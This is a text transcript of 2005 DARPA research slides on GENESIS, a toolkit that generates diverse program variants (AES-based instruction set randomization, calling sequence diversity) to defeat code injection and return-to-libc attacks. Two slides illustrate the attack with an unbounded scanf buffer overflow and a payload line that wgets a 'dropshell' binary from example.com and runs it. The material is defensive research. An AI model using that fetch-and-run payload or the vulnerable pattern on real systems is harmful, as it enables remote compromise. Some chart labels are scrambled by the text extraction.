G E N E S I S : A Framework For Achieving Component Diversity
description
Transcript of G E N E S I S : A Framework For Achieving Component Diversity
GENESIS: A Framework For Achieving Component Diversity
John C. Knight, Jack W. Davidson, David Evans, Anh Nguyen-TuongUniversity of Virginia
Chenxi WangCarnegie Mellon University
University of Virginia www.cs.virginia.edu/genesis
DARPA SRS July 2005 PI Meeting 2
Project Overview
Existing practice: Monoculture
Technical objectives: Exploit artificial diversity
to break existing software monoculture
Technical approach: Artificial diversity at
compile, link, load, and execution times
Combinations selectable with toolkit
Source Code
Object Code
Executable
Compile
Link
Load
Run
Diversity Transforms
University of Virginia www.cs.virginia.edu/genesis
DARPA SRS July 2005 PI Meeting 3
Major risks and planned mitigation: Susceptibility to new class of attacks Deployment issues Ad hoc evaluation
Quantitative metrics: Fraction of variants that remain susceptible to
attack after transformation Expected major achievements:
Significant reduction in susceptibility Task milestones (schedule 12/31/05):
Complete diversity toolkit Evaluate complete spectrum of diversity
techniques
Project Overview
University of Virginia www.cs.virginia.edu/genesis
DARPA SRS July 2005 PI Meeting 4
Genesis Diversity Toolkit
DiversitySpecification
Application Variants
Genesis Execution Environment
Server Farm
Front End(lcc)
Front End(Phoenix)
Front End(EDG)
Diversity Generator
Backend(VPO)
Linker(Diablo)
RTLs Object Files
FECSD
SSR
RuntimeLibraries
SourceFiles
AES/XOR
AES/XORIT
CSD
IT
StrataLibraries
Genesis Diversity Generator
University of Virginia www.cs.virginia.edu/genesis
DARPA SRS July 2005 PI Meeting 5
Genesis Diversity Generator
Front End(lcc)
Front End(Phoenix)
Front End(EDG)
Diversity Generator
Backend(VPO)
Linker(Diablo)
RTLs Object Files
Executable
FECSD
SSR
RuntimeLibraries
SourceFiles
AES/XOR
AES/XORIT
DiversitySpecification
CSD
IT
StrataLibraries
University of Virginia www.cs.virginia.edu/genesis
DARPA SRS July 2005 PI Meeting 6
University of Virginia www.cs.virginia.edu/genesis
DARPA SRS July 2005 PI Meeting 7
Strong ISR using AES and IT
Randomized Instruction Set Emulation, E. G. Barrantes, D. H. Ackley, S. Forrest, and D. Stefanovi, ACM Transactions on Information System Security. 8(1), pp. 3-40.
Current implementations of ISR execute injected code Random instruction sequences are executed Rely on probabilistic arguments that the random sequences
will crash harmlessly Not realistic for critical embedded systems Recovery of application is difficult/impossible
Vulnerable to attack Where’s the FEEB?, Ana Sovarel and Dave Evans, USENIX
Security Conference, August 2005. Overhead issues (both space and time)
University of Virginia www.cs.virginia.edu/genesis
DARPA SRS July 2005 PI Meeting 8
Strong ISR using AES and IT
F: inst1inst2inst3bne L1inst5
L1: inst6...
Diablo tags and pads
instructions
3B0x40
0x41
0x42
Address
0x43
0x44
0x45
0x46
0x47
0x48
23
F4
71
3A
21
0x49
0x4A
0x4B
0x4C
0x4D
inst1
25
DB
3C
bne
4E
inst2
49
57
0x4E
0x4F
7E
33
67
inst3
...
inst4
inst5
inst6
0x50
3B
0x40
0x41
0x42
Address
0x43
0x44
0x45
0x46
0x47
0x48
23
F4
71
3A
21
0x49
0x4A
0x4B
0x4C
0x4D
inst1
25
DB
3C
bne
50
inst2
49
57
0x4E
0x4F
7E
nop
inst3
33
inst4
inst5
inst6
0x50
67
...
Diablo encrypts with AES
128-bit block
tag
tag
tag
tag
2A
0x40
0x41
0x42
Address
0x43
0x44
0x45
0x46
0x47
0x48
37
FB
23
8C
67
0x49
0x4A
0x4B
0x4C
0x4D
27
54
BF
99
12
49
57
0x4E
0x4F
7E
45
33
0x50
67
...
45
37
06
67
University of Virginia www.cs.virginia.edu/genesis
DARPA SRS July 2005 PI Meeting 9
Strong ISR using AES and IT
Diablo
M1.o
M2.o
Application binary modules
Secure key
0f e3ac82…34b2d712652f…
L2: 3782a31423ba21d3d3d2b14e…ef 9d
L4: 3d3ff 32e…
Context Switch
Fetch
Decode
Translate
New PC
Finished?
No
Strata Virtual Machine
Yes
Context Capture
Cached?
Yes
New Fragment
Next PC
Encrypted Application
glibc.a
crt0.o
Runtime libraries modules
Link time Run time
Decrypt.Engine
Decrypt block and check tagIf tag invalid, do not execute fragment.
University of Virginia www.cs.virginia.edu/genesis
DARPA SRS July 2005 PI Meeting 10
CSD: Calling sequence diversity
Compile-time/runtime technique to create a software population with many different calling sequences
Effective defense against “return-to-libc” attacks (also known as arc injection, Pincus and Baker, IEEE Security and Privacy, 2(4), pp. 20-27) Return-to-libc does not require injecting code into
the application ISR is not an effective defense against return-to-
libc type attacks
University of Virginia www.cs.virginia.edu/genesis
DARPA SRS July 2005 PI Meeting 11
Return-to-libc attack
void bar(int arg1, int arg2) {char buffer[100];…scanf(“%s”, buffer)….
}
…arg2arg1
return addrSaved ebp
buffer
Runtime Stack
…arg2
Bad argsystem
Saved ebpbuffer
Runtime StackBuffer O
verflow
wget: http://www.example.com/dropshell ;chmod +x dropshell ; ./dropshell
University of Virginia www.cs.virginia.edu/genesis
DARPA SRS July 2005 PI Meeting 12
void bar() {…key=Keygen(key, &bar, &foo);foo(arg1, arg2);key=Keygen(key, &foo, &bar);…key=Keygen(key, &bar, &baz);baz(arg);key=Keygen(key, &baz, &bar);…
}void foo(int a1, int a2) {
Keycheck(key);…Keycheck(key);
}
CSD: Calling sequence diversity
University of Virginia www.cs.virginia.edu/genesis
DARPA SRS July 2005 PI Meeting 13
CSD: Calling sequence diversity
Calls to Keygen and Keycheck routines are inserted by the compiler front end (lcc, edg, Phoenix)
At runtime: Strata generates a key for each function
(stored in protected region) Replaces calls with inline code to generate
proper key or check that the key has the proper value
University of Virginia www.cs.virginia.edu/genesis
DARPA SRS July 2005 PI Meeting 14
Return-to-libc attack
void bad(int arg1, int arg2) {char buffer[100];…scanf(“%s”, buffer)….
}
…arg2arg1
return addrSaved ebp
buffer
Runtime Stack
…arg2
Bad argsystem
Saved ebpbuffer
Runtime StackBuffer O
verflow
wget: http://www.example.com/dropshell ;chmod +x dropshell ; ./dropshell
University of Virginia www.cs.virginia.edu/genesis
DARPA SRS July 2005 PI Meeting 15
Genesis Diversity Toolkit
DiversitySpecification
Application Variants
Genesis Execution Environment
Server Farm
Front End(lcc)
Front End(Phoenix)
Front End(EDG)
Diversity Generator
Backend(VPO)
Linker(Diablo)
RTLs Object Files
FECSD
SSR
RuntimeLibraries
SourceFiles
AES/XOR
AES/XORIT
CSD
IT
StrataLibraries
Genesis Diversity Generator
University of Virginia www.cs.virginia.edu/genesis
DARPA SRS July 2005 PI Meeting 16
Toolkit Execution Environment
DiversitySpecification
Application Variants
Genesis Execution Environment
Server Farm
App
licat
ion
Var
iant
s fr
om
Div
ersi
ty G
ener
ator
University of Virginia www.cs.virginia.edu/genesis
DARPA SRS July 2005 PI Meeting 17
University of Virginia www.cs.virginia.edu/genesis
DARPA SRS July 2005 PI Meeting 18
Performance
Apache Performance(w/fast returns, w/IBTC)
0
0.2
0.4
0.6
0.8
1
1.2
1.4
csd=
0.pr
efix
=0.a
es=0
.xor
=0.s
sr=0
csd=
0.pr
efix
=0.a
es=0
.xor
=0.s
sr=6
4
csd=
0.pr
efix
=0.a
es=0
.xor
=1.s
sr=0
csd=
0.pr
efix
=0.a
es=0
.xor
=1.s
sr=6
4
csd=
0.pr
efix
=0.a
es=1
.xor
=0.s
sr=0
csd=
0.pr
efix
=0.a
es=1
.xor
=0.s
sr=6
4
csd=
0.pr
efix
=1.a
es=0
.xor
=0.s
sr=0
csd=
0.pr
efix
=1.a
es=0
.xor
=0.s
sr=6
4
csd=
0.pr
efix
=1.a
es=0
.xor
=1.s
sr=0
csd=
0.pr
efix
=1.a
es=0
.xor
=1.s
sr=6
4
csd=
0.pr
efix
=1.a
es=1
.xor
=0.s
sr=0
csd=
0.pr
efix
=1.a
es=1
.xor
=0.s
sr=6
4
csd=
1.pr
efix
=0.a
es=0
.xor
=0.s
sr=0
csd=
1.pr
efix
=0.a
es=0
.xor
=0.s
sr=6
4
csd=
1.pr
efix
=0.a
es=0
.xor
=1.s
sr=0
csd=
1.pr
efix
=0.a
es=0
.xor
=1.s
sr=6
4
csd=
1.pr
efix
=0.a
es=1
.xor
=0.s
sr=0
csd=
1.pr
efix
=0.a
es=1
.xor
=0.s
sr=6
4
csd=
1.pr
efix
=1.a
es=0
.xor
=0.s
sr=0
csd=
1.pr
efix
=1.a
es=0
.xor
=0.s
sr=6
4
csd=
1.pr
efix
=1.a
es=0
.xor
=1.s
sr=0
csd=
1.pr
efix
=1.a
es=0
.xor
=1.s
sr=6
4
csd=
1.pr
efix
=1.a
es=1
.xor
=0.s
sr=0
csd=
1.pr
efix
=1.a
es=1
.xor
=0.s
sr=6
4no
str
ata
Configuration
Slo
wd
ow
n
No Checking
Checking
University of Virginia www.cs.virginia.edu/genesis
DARPA SRS July 2005 PI Meeting 19
Progress Towards Metric
Diversity toolkit facilitates: Creation of large number of variants Operating, attacking & monitoring variants
Large numbers of variants of Apache created and tested, success rate very high
Disclaimers: Only one application Synthetic but realistic vulnerabilities No statistical significance